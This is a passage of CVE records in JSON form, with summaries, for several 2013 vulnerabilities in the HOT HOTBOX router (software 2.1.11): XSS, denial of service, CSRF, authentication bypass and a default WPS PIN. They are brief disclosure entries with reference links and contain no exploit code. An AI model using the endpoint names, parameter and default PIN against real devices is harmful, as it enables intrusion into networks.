            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5218",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.356Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5220 (GCVE-0-2013-5220)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.402Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5220",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5220",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.402Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5039 (GCVE-0-2013-5039)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.307Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5039",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5039",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.307Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5038 (GCVE-0-2013-5038)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.212Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5038",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5038",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.212Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5037 (GCVE-0-2013-5037)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.247Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5037",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5037",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.247Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }